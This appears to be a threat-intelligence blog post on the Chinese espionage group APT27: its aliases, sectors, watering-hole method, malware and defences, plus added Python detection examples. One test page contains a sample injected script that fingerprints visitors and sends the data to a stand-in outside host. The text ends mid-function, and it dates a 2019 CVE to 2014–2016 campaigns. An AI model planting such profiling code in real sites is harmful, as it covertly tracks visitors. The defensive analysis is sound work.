Threat Intelligence

APT27: Emissary Panda — China's Strategic Web Compromise Specialists Targeting Defence and Energy

> threat_actor APT27 —— origin: China (PRC / MSS-assessed) —— alias: Emissary Panda / LuckyMouse —— signature: strategic web compromise + enterprise intrusion

Hedgehog Security, 6 January 2026
apt27 emissary-panda luckymouse china defence energy threat-intelligence cyber-espionage watering-hole

The group that compromises the waterhole.

APT27 — also tracked as Emissary Panda, LuckyMouse, Iron Tiger, Bronze Union, Group 35, ZipToken, TG-3390, Earth Smilodon, and Budworm — is a Chinese state-sponsored threat group that has been conducting cyber espionage operations since at least 2010. APT27 is distinguished by its persistent targeting of defence, aerospace, energy, government, and technology sectors, with a particular emphasis on strategic web compromises (watering hole attacks) as a primary method of initial access. Their campaigns are characterised by methodical, long-duration intrusions designed to harvest sensitive data — intellectual property, government policy documents, military technology, and energy sector intelligence — that directly serves the People's Republic of China's geopolitical and economic interests.

The group's operational tradecraft has evolved significantly over its fifteen-year history. Early campaigns relied heavily on spear-phishing and exploitation of Microsoft SharePoint vulnerabilities to gain footholds in target networks. From approximately 2017 onward, APT27 shifted toward strategic web compromises at scale — identifying and compromising websites frequented by personnel in targeted industries and injecting exploit code that silently delivers malware to visitors matching specific targeting criteria. This evolution reflects a broader trend in Chinese cyber operations: moving away from high-volume, easily attributable phishing campaigns toward more surgical initial access methods that are harder to detect and attribute.

APT27's technical arsenal centres on a suite of custom malware — most notably the HyperBro RAT and the SysUpdate backdoor — supplemented by shared Chinese tooling such as PlugX and the China Chopper web shell. In recent years, the group has demonstrated a significant expansion of capabilities: developing cross-platform Linux variants of their implants, leveraging legitimate cloud services (including Google Drive and Pastebin) for command and control communications, and exploiting high-profile vulnerabilities like ProxyLogon (CVE-2021-26855) to compromise Microsoft Exchange servers at scale. The German Federal Office for the Protection of the Constitution (BfV) publicly attributed APT27 campaigns to the PRC in January 2022, issuing a formal advisory warning German organisations — particularly those in the defence and technology sectors — of the group's active targeting.


Linking APT27 to Chinese state-sponsored operations.

| Attribute | Detail |
|---|---|
| Tracked Names | APT27 (Mandiant/Google), Emissary Panda (CrowdStrike), LuckyMouse (Kaspersky), Iron Tiger (Trend Micro), Bronze Union (Secureworks), Group 35 (Talos), ZipToken (various), TG-3390 (Dell SecureWorks), Earth Smilodon (Trend Micro), Budworm (Symantec) |
| Country of Origin | People's Republic of China — APT27's operations are assessed with high confidence to be state-sponsored, likely operating under the direction of Chinese intelligence services. The German Federal Office for the Protection of the Constitution (Bundesamt für Verfassungsschutz, BfV) formally attributed APT27 campaigns to the PRC in a January 2022 advisory, marking one of the most explicit European governmental attributions of a Chinese APT group. The group's targeting priorities — defence, aerospace, energy, and government — align consistently with China's strategic intelligence requirements and economic development objectives. |
| Suspected Affiliation | Assessed to operate under the direction of the Chinese Ministry of State Security (MSS) or an affiliated provincial bureau, though the precise organisational relationship has not been publicly confirmed with the same specificity as groups like APT41 (Chengdu 404) or APT10 (Tianjin Bureau). APT27's operational patterns — working hours aligned to China Standard Time, targeting aligned with PRC strategic priorities, and use of infrastructure and tooling shared with other known MSS-affiliated groups — support a state-sponsored attribution. The group's long operational history and sustained access to zero-day capabilities suggest institutional backing rather than freelance activity. |
| First Observed | At least 2010, making APT27 one of the longer-running Chinese APT groups. Early operations focused on defence contractors, government agencies, and technology companies in the United States and Europe. The group's tradecraft has evolved substantially since its earliest campaigns, transitioning from broad spear-phishing operations to highly targeted strategic web compromises and vulnerability exploitation, reflecting both operational maturation and adaptations to improved Western defensive capabilities. |
| Primary Motivation | State-directed cyber espionage for strategic intelligence collection. APT27's campaigns consistently target data that serves the PRC's geopolitical, military, and economic interests: defence and aerospace technology, energy sector intelligence, government policy documents, diplomatic communications, and telecommunications infrastructure data. Unlike APT41, there is no credible evidence of financially motivated operations — APT27 appears to operate exclusively in service of state intelligence requirements. |

Defence, energy, and strategic infrastructure.

APT27's targeting is tightly aligned with China's strategic intelligence priorities — particularly in defence, aerospace, energy, and government sectors. Unlike more broadly targeted groups, APT27 demonstrates a focused operational mandate, concentrating on industries where stolen data provides direct strategic advantage to the PRC. Geographically, early campaigns concentrated on North America and Western Europe, but from approximately 2015 onward the group expanded significantly into the Middle East, Central Asia, and Southeast Asia — regions where China's Belt and Road Initiative and energy security interests create intelligence requirements. Targeted countries include the United States, United Kingdom, Germany, France, India, Turkey, Israel, Mongolia, and multiple Central Asian republics.

| Sector | Strategic Value | Observed Targeting |
|---|---|---|
| Defence & Aerospace | Military technology, weapons systems specifications, defence procurement data, and strategic communications intelligence — directly supporting PLA modernisation and China's defence industrial base | Sustained campaigns against defence contractors, military research institutions, and aerospace manufacturers in the US, Europe, and Asia. Targeted data includes weapons platform designs, satellite systems, radar technology, and military logistics information. APT27 has maintained persistent access to some defence targets for years. |
| Energy | Oil and gas exploration data, power grid architecture, nuclear technology, and renewable energy intellectual property — supporting China's energy security strategy and industrial competitiveness | Targeted energy companies across the oil, gas, nuclear, and renewable sectors in the US, Middle East, and Central Asia. Campaigns have focused on extracting exploration data, operational technology documentation, and strategic energy policy information. Targeting intensified alongside China's Belt and Road energy infrastructure investments. |
| Government | Diplomatic intelligence, foreign policy positions, trade negotiation strategies, and surveillance of individuals of interest to Chinese intelligence services | Compromised government agencies and foreign ministries in the US, Europe, Middle East, and Southeast Asia. Targeted data includes diplomatic cables, policy analysis documents, and intelligence related to bilateral relationships and multilateral negotiations involving China. |
| Telecommunications | Network architecture data, call detail records, and infrastructure access enabling surveillance of targeted individuals without direct device compromise | Targeted telecoms operators in Central Asia, the Middle East, and Southeast Asia. Access to telecommunications infrastructure provides persistent surveillance capabilities against individuals of intelligence interest, including government officials, dissidents, and journalists. |
| Technology | Source code, intellectual property, product roadmaps, and supply chain intelligence supporting China's technological self-sufficiency goals | Compromised technology companies in the US, Europe, and Asia-Pacific. Targeted data includes proprietary source code, trade secrets, product development plans, and data that could provide competitive advantage to Chinese technology firms. |
| Education & Research | Access to cutting-edge research in defence-relevant fields, advanced materials science, and technology areas aligned with PRC strategic priorities | Targeted universities and research institutions conducting work in areas of interest to the PRC — particularly those with defence research contracts or partnerships with targeted defence and technology organisations. |

Strategic web compromises at industrial scale.

APT27's defining operational characteristic is its mastery of strategic web compromises — commonly known as watering hole attacks. Rather than sending phishing emails directly to targets (an approach that is increasingly detected and blocked), APT27 identifies websites that are frequently visited by personnel in their target industries and compromises those sites to serve as malware delivery platforms. This technique inverts the attacker-defender dynamic: instead of the threat actor reaching out to the victim, the victim comes to the threat actor. The compromise of a single industry-specific website can provide access to dozens or hundreds of organisations in the target sector, all without sending a single email.

APT27's watering hole operations are characterised by careful reconnaissance and precise targeting. The group typically profiles website visitors using JavaScript code that collects information about the visitor's browser, operating system, IP address, and installed plugins. Only visitors matching specific criteria — such as IP ranges belonging to targeted organisations or browser configurations indicating a corporate environment — are served exploits. This selectivity serves a dual purpose: it maximises the value of the operation by focusing on high-priority targets, and it minimises the risk of detection by ensuring that security researchers and automated scanning tools are less likely to trigger the exploit chain.

The exploit chains deployed through these watering holes have evolved over time. Earlier campaigns exploited Internet Explorer and Java vulnerabilities, while more recent operations have leveraged browser-based exploits targeting Chrome and Firefox, as well as vulnerabilities in commonly deployed enterprise software. Once a visitor is compromised, APT27 typically deploys an initial-stage loader that retrieves the group's primary implant — HyperBro or SysUpdate — from a separate staging server, minimising the amount of malicious code hosted on the compromised website and complicating forensic analysis for incident responders.

APT27 — Strategic Web Compromise (Watering Hole) Attack Model
Phase 1 — Reconnaissance & Site Selection
✓ Identify websites frequented by personnel in target sector
✓ Assess website security posture and identify exploitable vulnerabilities
✓ Map visitor demographics (IP ranges, organisations, roles)
✓ Select optimal compromise point (high traffic, low security, right audience)

Phase 2 — Website Compromise & Exploit Injection
✓ Exploit vulnerability in website CMS, plugin, or server software
✓ Inject malicious JavaScript profiling code into website pages
✓ Deploy server-side exploit delivery framework (browser exploit kit)
✓ Establish persistence on compromised web server via web shell

Phase 3 — Visitor Profiling & Selective Exploitation
✓ JavaScript collects visitor metadata:
— IP address (matched against target org ranges)
— Browser version and user-agent string
— Installed plugins and browser extensions
— Operating system and architecture
✓ If visitor matches targeting criteria → redirect to exploit chain
✓ If visitor does not match → serve legitimate website content only

Phase 4 — Payload Delivery & Implant Deployment
✓ Browser exploit achieves code execution on visitor workstation
✓ Initial loader downloaded from separate staging infrastructure
✓ Loader retrieves and deploys primary implant (HyperBro / SysUpdate)
✓ Implant establishes C2 communication (HTTPS / cloud service API)
✓ Persistence established via DLL side-loading or scheduled task

Phase 5 — Post-Compromise Operations
✓ Credential harvesting (Mimikatz, custom dumpers)
✓ Lateral movement across enterprise network
✓ Privilege escalation to domain administrator
✓ Data staging and exfiltration via encrypted channels
✓ Maintain persistent access for long-term intelligence collection
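The injection step in Phase 2 and the visitor profiling in Phase 3 are what a site owner can actually watch for on their own pages. The following is an added example, not code from the original post: it diffs a re-fetched page against a baseline of expected script origins and inline-script hashes, and classifies any new inline script that reads the browser metadata listed above (user-agent, plugins, platform) as a likely profiler. The page HTML, hostnames and baseline are constructed for the example.

```python
"""Audit a web page for scripts that were not there before.

Added example, not code from the original post or from any vendor it cites.
A site owner records a baseline of the script origins and inline-script
hashes each page should carry, re-fetches the page on a schedule and diffs
it; an injected profiler (reading user-agent, plugins, platform and so on)
shows up as a new inline script carrying fingerprinting calls. The sample
page, the baseline and the hostnames below are constructed for the example.
"""
import hashlib
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Fingerprinting APIs matching the visitor metadata the post lists
# (browser/user-agent, plugins, OS/architecture). Only new inline scripts
# are checked for them, so legitimate analytics in the baseline stay quiet.
PROFILING_MARKERS = (
    "navigator.userAgent", "navigator.plugins", "navigator.platform",
    "navigator.appVersion", "navigator.mimeTypes", "screen.width",
)


class _ScriptCollector(HTMLParser):
    """Collects <script src> URLs and inline <script> bodies."""

    def __init__(self):
        super().__init__()
        self.external = []
        self.inline = []
        self._in_script = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._in_script, self._buf = True, []

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._in_script:
            self._in_script = False
            self.inline.append("".join(self._buf))


def inline_hash(body: str) -> str:
    """SHA-256 of the whitespace-normalised script body (formatting churn is ignored)."""
    return hashlib.sha256(re.sub(r"\s+", " ", body).strip().encode()).hexdigest()


def audit_page(html: str, page_host: str, allowed_hosts: set, known_inline: set) -> list:
    """Return findings for every script not covered by the baseline."""
    parser = _ScriptCollector()
    parser.feed(html)
    findings = []
    for src in parser.external:
        host = urlparse(src).netloc.lower() or page_host  # relative src = same origin
        if host not in allowed_hosts:
            findings.append({"kind": "unexpected_external", "detail": src, "markers": []})
    for body in parser.inline:
        digest = inline_hash(body)
        if digest in known_inline:
            continue
        markers = [m for m in PROFILING_MARKERS if m in body]
        findings.append({"kind": "profiling_inline" if markers else "unknown_inline",
                         "detail": digest[:16], "markers": markers})
    return findings


# --- constructed sample: an industry portal page with two injected scripts ---
PAGE_HOST = "portal.example-defence.test"
ALLOWED_HOSTS = {PAGE_HOST, "cdn.example-cms.test"}
KNOWN_INLINE = {inline_hash('console.log("portal loaded");')}

SAMPLE_HTML = """<html><head>
<script src="/static/app.js"></script>
<script src="https://cdn.example-cms.test/jquery.min.js"></script>
<script>console.log("portal loaded");</script>
<script src="https://cdn.example-unrelated.test/p.js"></script>
<script>
var ua = navigator.userAgent, names = [];
for (var i = 0; i < navigator.plugins.length; i++) names.push(navigator.plugins[i].name);
new Image().src = "https://stats.example-unrelated.test/c?v=" + encodeURIComponent(ua + "|" + names.join(","));
</script>
</head><body><h1>Members area</h1></body></html>"""


if __name__ == "__main__":
    for f in audit_page(SAMPLE_HTML, PAGE_HOST, ALLOWED_HOSTS, KNOWN_INLINE):
        print(f["kind"], f["detail"], f["markers"])
```

Because the baseline is keyed on normalised hashes, a legitimate content update shows up as one `unknown_inline` finding to approve, while an injected profiler is separated out by its fingerprinting calls.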

Custom implants with shared Chinese heritage.

| Tool | Type | Capabilities |
|---|---|---|
| HyperBro | RAT (Custom) | APT27's flagship remote access trojan and the group's most distinctive tool. HyperBro is a fully featured backdoor that provides file management, command shell access, screen capture, keylogging, and proxy capabilities. It is typically deployed via DLL side-loading — using a legitimate signed executable to load a malicious DLL that decrypts and executes the HyperBro payload from an encrypted data file. This three-component deployment model (legitimate EXE + malicious DLL + encrypted payload) is a hallmark of APT27 operations. HyperBro communicates with C2 servers over HTTPS and supports configurable communication intervals. Recent variants have incorporated anti-analysis features including virtual machine detection and sandbox evasion. |
| SysUpdate | Backdoor (Custom, Cross-Platform) | A sophisticated backdoor that represents APT27's evolution toward cross-platform capabilities. SysUpdate was initially Windows-only but Trend Micro documented a Linux variant in 2023 — a significant development indicating that APT27 is adapting its tooling to target Linux-based infrastructure, including cloud environments and servers. SysUpdate supports file operations, command execution, process management, service manipulation, screenshot capture, and network tunnelling. It communicates via HTTPS and can leverage legitimate cloud services for C2 — including Google Drive APIs — to blend with normal enterprise traffic. |
| PlugX (Korplug) | RAT (Shared Chinese Tooling) | A modular remote access trojan shared across numerous Chinese APT groups. APT27 has been a prolific user of PlugX throughout its operational history, deploying it as both a primary implant and as a complement to HyperBro and SysUpdate. APT27's PlugX deployments typically use DLL side-loading via legitimate signed executables — the same three-component deployment model used for HyperBro. The group's PlugX configurations have been used for clustering and attribution, as APT27 tends to use distinctive mutex names, C2 communication patterns, and encryption keys. |
| ZXShell | Backdoor (Custom / Shared) | A backdoor rootkit that has been associated with APT27 since the group's earlier campaigns. ZXShell provides command execution, file management, and network proxy capabilities, with rootkit functionality to hide its presence on compromised systems. It includes features for port forwarding and reverse connections, enabling operators to pivot through compromised hosts. ZXShell's source code has been partially shared or leaked, leading to its adoption by other Chinese threat groups, but APT27 is assessed to be among its original developers or earliest adopters. |
| China Chopper | Web Shell | A compact (~4KB) web shell widely used across Chinese APT groups for maintaining access to compromised web servers. APT27 deploys China Chopper as an initial foothold on internet-facing servers — particularly following exploitation of SharePoint, Exchange, and other web application vulnerabilities. Despite its small size, China Chopper provides command execution, file management, database access, and virtual terminal capabilities. Its minimal footprint and encrypted communications make it difficult to detect through network traffic analysis alone. |
| ShadowPad | Modular Backdoor (Shared Chinese Tooling) | A highly modular backdoor platform that has proliferated across the Chinese threat landscape. APT27 adopted ShadowPad in later operations (approximately 2019 onward), likely through tooling sharing arrangements within the Chinese intelligence ecosystem. ShadowPad's plugin architecture supports a wide range of capabilities — keylogging, credential harvesting, file management, and network discovery — loaded on demand to minimise forensic footprint. Its use by APT27 alongside their custom tools reflects the group's pragmatic approach to tooling. |
| Cobalt Strike BEACON | Commercial C2 Framework | The commercially available post-exploitation framework widely adopted by both state-sponsored and criminal threat actors. APT27 uses Cobalt Strike as a flexible command and control platform, particularly during the lateral movement phase of operations. BEACON provides robust post-exploitation capabilities including credential theft, network enumeration, and file transfer. APT27 typically configures BEACON with HTTPS C2 channels and malleable communication profiles designed to mimic legitimate web traffic. |
| Mimikatz | Credential Harvesting (Open Source) | The widely used credential extraction tool employed by APT27 for harvesting Windows credentials from memory, including plaintext passwords, NTLM hashes, and Kerberos tickets. APT27 uses Mimikatz extensively during post-compromise operations to enable lateral movement across enterprise networks. The group has been observed using both standard Mimikatz binaries and customised variants designed to evade endpoint detection. |

Multiple vectors — one objective.

Strategic Web Compromise (Watering Hole)
APT27's signature initial access technique and the one that most clearly distinguishes them from other Chinese APT groups. The group identifies and compromises websites frequented by personnel in targeted industries — defence industry portals, energy sector news sites, government resource pages, and industry association websites. Malicious JavaScript injected into these sites profiles visitors and selectively delivers browser exploits to those matching targeting criteria (specific IP ranges, organisation domains, or geographic locations). This approach provides access to multiple organisations through a single compromise and avoids the detection risks associated with direct email-based phishing.
SharePoint & Exchange Exploitation
APT27 has conducted extensive campaigns exploiting vulnerabilities in Microsoft SharePoint and Exchange servers. The group was one of the earliest and most prolific exploiters of SharePoint vulnerabilities for initial access, targeting internet-facing SharePoint servers to gain footholds in government and defence networks. Following the disclosure of ProxyLogon (CVE-2021-26855) and related Exchange vulnerabilities in early 2021, APT27 rapidly weaponised these flaws to compromise Exchange servers worldwide, deploying China Chopper web shells and subsequently loading HyperBro or SysUpdate implants for persistent access.
Spear-Phishing
APT27 employs targeted spear-phishing emails, particularly in earlier campaigns and when watering hole opportunities are unavailable. Phishing lures are tailored to the recipient's industry and role — common themes include defence procurement announcements, energy sector policy updates, and government advisory notices. Malicious attachments typically exploit vulnerabilities in Microsoft Office (particularly RTF and DOCX formats) to execute shellcode that downloads and installs the group's implants. More recent phishing operations have used password-protected archives containing LNK files or ISO images to bypass email security gateways.
Vulnerability Exploitation
Beyond SharePoint and Exchange, APT27 actively exploits vulnerabilities in internet-facing applications and network appliances. The group has targeted flaws in VPN concentrators, web application frameworks, and content management systems. APT27 demonstrates a capability to weaponise publicly disclosed vulnerabilities within days of disclosure, though they are not typically associated with zero-day exploitation at the same frequency as groups like APT41. Their exploitation focus tends toward enterprise infrastructure — technologies deployed in the government and defence environments that constitute their primary targets.
Supply Chain Compromise
APT27 has conducted supply chain attacks, though this technique is less central to their operations than it is for APT41. The group has been observed compromising legitimate software distribution channels and update mechanisms to deliver implants to targeted organisations. These operations demonstrate the group's ability to combine strategic web compromise techniques with supply chain access, expanding the reach of individual campaigns and complicating attribution and detection for defenders.
Cloud Service Abuse
In more recent campaigns, APT27 has leveraged legitimate cloud services as both initial delivery vectors and command and control channels. The group has been observed hosting malicious payloads on Google Drive, Microsoft OneDrive, and other cloud storage platforms, exploiting the implicit trust that organisations place in traffic to and from major cloud providers. This technique allows APT27 to bypass network-based security controls that whitelist traffic to trusted cloud domains.

From SharePoint to global Exchange exploitation.

APT27's campaign history reveals a group that has steadily expanded its targeting scope and technical sophistication over more than a decade of operations. Early campaigns (2010–2014) were characterised by spear-phishing operations and exploitation of document rendering vulnerabilities, primarily targeting defence contractors and government agencies in the United States and Western Europe. These initial operations, documented by Dell SecureWorks under the designation TG-3390, established the group's core focus areas and demonstrated their ability to maintain persistent access to high-value targets for extended periods — in some cases, years of undetected presence within compromised networks.

The SharePoint exploitation campaigns (2014–2016) marked APT27's emergence as a particularly dangerous threat to enterprise environments. The group identified that many government and defence organisations relied on internet-facing Microsoft SharePoint servers for collaboration and document management, and systematically targeted vulnerabilities in these platforms — including CVE-2019-0604 and earlier SharePoint flaws — to gain initial access. Once inside, APT27 deployed PlugX and HyperBro implants, established persistence through DLL side-loading, and conducted methodical lateral movement to reach high-value data repositories. These campaigns demonstrated APT27's understanding of enterprise IT architecture and their ability to navigate complex corporate networks to reach their intelligence objectives.

From 2017 onward, APT27's strategic web compromise campaigns became the group's defining operational characteristic. Kaspersky documented a series of campaigns under the LuckyMouse designation in which APT27 compromised websites belonging to government agencies and industry organisations in Central Asia and the Middle East, using them as watering holes to deliver HyperBro and PlugX to visitors from targeted organisations. In one notable campaign, the group compromised the website of a national data centre in a Central Asian country, gaining access to a wide range of government systems through a single compromise point. These operations demonstrated APT27's strategic thinking — rather than targeting individual organisations, they targeted shared infrastructure and common resources to achieve broad access efficiently.

The ProxyLogon exploitation campaign (March 2021 onward) represented APT27's most aggressive and wide-ranging operation. Following the disclosure of critical vulnerabilities in Microsoft Exchange Server — collectively known as ProxyLogon (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065) — APT27 was among the threat groups that rapidly weaponised these flaws. The German BfV specifically attributed exploitation of ProxyLogon to APT27 in their January 2022 advisory, noting that the group targeted German organisations in the defence and technology sectors. APT27 used the Exchange vulnerabilities to deploy China Chopper web shells, which served as initial footholds for loading HyperBro RAT payloads. The scale of Exchange exploitation was unprecedented — thousands of Exchange servers worldwide were compromised by multiple Chinese threat groups in a matter of days, with APT27 focusing on targets aligned with their established intelligence priorities.

The German BfV advisory and attribution (January 2022) was a landmark moment for APT27. The BfV — Germany's domestic intelligence agency — issued a formal cyber threat advisory specifically identifying APT27 as a PRC-sponsored threat group actively targeting German organisations. The advisory detailed APT27's use of HyperBro RAT, described the group's DLL side-loading deployment methodology, and provided specific indicators of compromise to assist German defenders. This represented one of the most explicit European governmental attributions of a Chinese APT group and signalled a shift in how European nations publicly address Chinese cyber espionage — moving from diplomatic discretion to direct, named attribution.

In 2023 and 2024, APT27 continued to evolve with campaigns deploying cross-platform Linux variants of SysUpdate and targeting cloud infrastructure. Trend Micro documented the Earth Smilodon campaigns in which APT27 deployed Linux-compatible backdoors against servers and containerised environments, reflecting the group's adaptation to modern enterprise architectures where critical workloads increasingly run on Linux-based systems. Simultaneously, the group expanded its use of legitimate cloud services — including Google Drive and Dropbox APIs — for command and control communications, making network-level detection significantly more challenging for defenders who cannot easily block traffic to major cloud platforms.


Defending against patient enterprise intruders.

Defending against APT27 requires a layered security approach that accounts for the group's diverse initial access methods, patient post-compromise tradecraft, and increasingly sophisticated evasion techniques. APT27 is a persistent threat — once inside a network, they establish multiple persistence mechanisms and can maintain access for months or years. Their use of legitimate cloud services for C2, DLL side-loading via trusted executables, and cross-platform malware means that no single defensive control is sufficient. Effective defence requires combining proactive vulnerability management, robust endpoint detection, network monitoring, and active threat hunting.

Web Application & Exchange Hardening
APT27 heavily targets internet-facing web applications — particularly Microsoft SharePoint and Exchange servers. Ensure all internet-facing applications are patched with extreme urgency, with a critical-patch SLA of 24–48 hours for high-severity vulnerabilities. Deploy web application firewalls (WAF) with virtual patching capability. Restrict internet-facing SharePoint and Exchange exposure through VPN or zero-trust network access where possible. Monitor Exchange servers for web shell deployment and unusual IIS worker process behaviour.
DLL Side-Loading Detection
APT27's signature deployment method uses legitimate signed executables to side-load malicious DLLs. Monitor for known legitimate executables loading DLLs from unusual directories — particularly from user-writable locations such as %APPDATA%, %TEMP%, or non-standard program directories. Deploy application whitelisting or application control policies that restrict DLL loading paths. Alert on the creation of the three-component deployment pattern: legitimate EXE + non-standard DLL + encrypted data file appearing together in unexpected locations.
Cloud Service C2 Detection
APT27's use of legitimate cloud services (Google Drive, Dropbox, OneDrive) for C2 communications makes traditional network-based detection challenging. Deploy SSL/TLS inspection to examine encrypted traffic to cloud services. Monitor for unusual patterns in cloud API usage — regular, periodic connections to cloud storage APIs from endpoints that do not normally use these services. Implement cloud access security broker (CASB) solutions to gain visibility into cloud service interactions and detect anomalous file upload/download patterns.
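The "regular, periodic connections" signal above can be scored directly from proxy logs. The following is an added example, not code from the original post: it keeps only connections to cloud-storage API hosts, measures how evenly spaced each source's connections are (jitter relative to the period), and reports sources that beacon regularly without being in a baseline of hosts known to use that service. The log format, hostnames and baseline are constructed for the example.

```python
"""Spot periodic beaconing to cloud-storage APIs in web-proxy logs.

Added example, not code from the original post. A flow (source host to
cloud-storage API host) is reported when it has enough hits, the gaps
between hits are nearly constant (low coefficient of variation), and the
source is not a known legitimate user of that service. The record format,
the hostnames and the baseline below are constructed for the example.
"""
import statistics
from collections import defaultdict
from datetime import datetime, timedelta

CLOUD_STORAGE_HOSTS = {
    "www.googleapis.com", "drive.google.com", "api.dropboxapi.com",
    "content.dropboxapi.com", "graph.microsoft.com", "onedrive.live.com",
}
# (source, destination) pairs that legitimately sync (hypothetical baseline)
KNOWN_CLOUD_USERS = {("ws-marketing-07", "api.dropboxapi.com")}


def parse_line(line: str):
    """Constructed format: '<ISO timestamp> <src_host> <dest_host> <bytes_out> <bytes_in>'."""
    ts, src, dst, out_b, in_b = line.split()
    return datetime.fromisoformat(ts), src, dst, int(out_b), int(in_b)


def find_beacons(lines, min_hits: int = 6, max_cv: float = 0.15, baseline=KNOWN_CLOUD_USERS):
    """Return [(src, dst, hits, mean_gap_seconds, cv)] for flows that look like beacons."""
    flows = defaultdict(list)
    for line in lines:
        if not line.strip():
            continue
        ts, src, dst, _out, _in = parse_line(line)
        if dst in CLOUD_STORAGE_HOSTS:
            flows[(src, dst)].append(ts)
    results = []
    for (src, dst), stamps in flows.items():
        if len(stamps) < min_hits or (src, dst) in baseline:
            continue
        stamps.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        mean = statistics.mean(gaps)
        if mean <= 0:
            continue
        cv = statistics.pstdev(gaps) / mean  # jitter as a fraction of the period
        if cv <= max_cv:
            results.append((src, dst, len(stamps), round(mean, 1), round(cv, 3)))
    return results


def make_sample_log():
    """Constructed records: one beacon-like flow, one human-like flow, one baselined, one sparse."""
    base = datetime(2025, 11, 3, 8, 0, 0)
    lines = []
    # srv-files-02: a file server checking the Drive API every ~300 s with slight jitter
    for i, jitter in enumerate((0, 4, -3, 2, -5, 3, -2, 1)):
        t = base + timedelta(seconds=300 * i + jitter)
        lines.append(f"{t.isoformat()} srv-files-02 www.googleapis.com 812 1024")
    # ws-hr-03: a person using Drive, irregular gaps
    for off in (0, 45, 400, 430, 1900, 1950, 5000):
        t = base + timedelta(seconds=off)
        lines.append(f"{t.isoformat()} ws-hr-03 www.googleapis.com 2200 51000")
    # ws-marketing-07: a regular sync client that is in the baseline
    for i in range(8):
        t = base + timedelta(seconds=600 * i)
        lines.append(f"{t.isoformat()} ws-marketing-07 api.dropboxapi.com 500 500")
    # ws-eng-12: too few hits to judge
    for i in range(3):
        t = base + timedelta(seconds=120 * i)
        lines.append(f"{t.isoformat()} ws-eng-12 drive.google.com 300 9000")
    return lines


if __name__ == "__main__":
    for src, dst, hits, mean_gap, cv in find_beacons(make_sample_log()):
        print(f"{src} -> {dst}: {hits} hits, period ~{mean_gap}s, jitter cv={cv}")
```

Run it over a day of logs with a per-source baseline built from the previous weeks; server infrastructure that suddenly starts beaconing to a storage API is the case the post singles out.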
Watering Hole Protection
Strategic web compromises are difficult to defend against because they exploit legitimate websites. Deploy browser isolation technologies that execute web content in sandboxed environments, preventing exploit code from reaching the endpoint. Maintain up-to-date browser and plugin patches to reduce the exploit surface. Implement network segmentation that limits the impact of workstation compromise. Use DNS security and web filtering to detect and block connections to known APT27 staging infrastructure.
Threat Hunting & IOC Monitoring
Proactively hunt for APT27 indicators of compromise and behavioural patterns. Key hunting queries include: HyperBro DLL side-loading artefacts, SysUpdate network communication patterns, unusual connections to cloud storage APIs from server infrastructure, China Chopper web shell signatures on web servers, and evidence of PlugX mutex creation. Monitor for the group's characteristic three-file deployment pattern and alert on the combination of a legitimate signed executable with a recently created DLL and encrypted data file in the same directory.
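The side-loading and three-file checks described above (and in the DLL Side-Loading Detection item) can be expressed as two hunting functions. The following is an added example, not code from the original post or the cited advisory: one scores Sysmon-style image-load events, the other walks a directory tree for a recently written DLL beside an EXE and a data file. Field names follow Sysmon Event ID 7; the `ProcessSigned` field, the sample events and the directory tree are assumptions or constructed for the example.

```python
"""Hunt for DLL side-loading and the three-file deployment pattern.

Added example, not code from the original post. score_image_load() rates
Sysmon-style image-load events (Event ID 7 fields: Image, ImageLoaded,
Signed, SignatureStatus); 'ProcessSigned' is an assumed extra field joined
from the loader's ProcessCreate event. find_deployment_triads() walks a
directory tree for a recently written DLL sitting beside an EXE and a data
file. The events and the directory tree below are constructed.
"""
import os
import tempfile
import time
from pathlib import PureWindowsPath

USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\programdata\\", "\\users\\public\\")
TRUSTED_ROOTS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")


def _user_writable(path: str) -> bool:
    p = path.lower()
    return any(marker in p for marker in USER_WRITABLE) and not p.startswith(TRUSTED_ROOTS)


def score_image_load(ev: dict):
    """Return (score, reasons); a score of 3 or more deserves analyst review."""
    image, loaded = ev.get("Image", ""), ev.get("ImageLoaded", "")
    score, reasons = 0, []
    if not loaded.lower().endswith(".dll"):
        return 0, reasons
    if _user_writable(loaded):
        score += 2
        reasons.append("DLL loaded from a user-writable directory")
    if ev.get("Signed", "true").lower() == "false" or ev.get("SignatureStatus", "Valid") != "Valid":
        score += 1
        reasons.append("loaded DLL is unsigned or its signature is invalid")
    if score and ev.get("ProcessSigned", "false").lower() == "true":
        score += 1
        reasons.append("loading process is a signed (legitimate-looking) executable")
    same_dir = PureWindowsPath(loaded).parent == PureWindowsPath(image).parent
    if same_dir and not image.lower().startswith(TRUSTED_ROOTS):
        score += 1
        reasons.append("DLL sits beside its loader outside trusted roots")
    return score, reasons


def find_deployment_triads(root: str, recent_seconds: int = 7 * 86400) -> list:
    """Directories under root holding an EXE, a DLL written within recent_seconds, and a data file."""
    hits, now = [], time.time()
    for dirpath, _subdirs, files in os.walk(root):
        by_ext = {}
        for name in files:
            by_ext.setdefault(os.path.splitext(name)[1].lower(), []).append(name)
        exes, dlls = by_ext.get(".exe", []), by_ext.get(".dll", [])
        data = [n for ext, names in by_ext.items() if ext not in (".exe", ".dll") for n in names]
        fresh = [d for d in dlls if now - os.path.getmtime(os.path.join(dirpath, d)) <= recent_seconds]
        if exes and fresh and data:
            hits.append({"dir": dirpath, "exe": exes, "dll": fresh, "data": data})
    return hits


# --- constructed sample events (paths and names are made up for the example) ---
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\explorer.exe", "ProcessSigned": "true",            # benign system load
     "ImageLoaded": r"C:\Windows\System32\shell32.dll", "Signed": "true", "SignatureStatus": "Valid"},
    {"Image": r"C:\Program Files\Vendor\app.exe", "ProcessSigned": "true",   # benign vendor DLL
     "ImageLoaded": r"C:\Program Files\Vendor\vendorlib.dll", "Signed": "true", "SignatureStatus": "Valid"},
    {"Image": r"C:\Users\alice\AppData\Roaming\Update\legit.exe", "ProcessSigned": "true",  # side-load
     "ImageLoaded": r"C:\Users\alice\AppData\Roaming\Update\helper.dll", "Signed": "false",
     "SignatureStatus": "Unavailable"},
]


def build_sample_tree() -> str:
    """Constructed directory layout: one triad, one dir without a DLL, one without a data file."""
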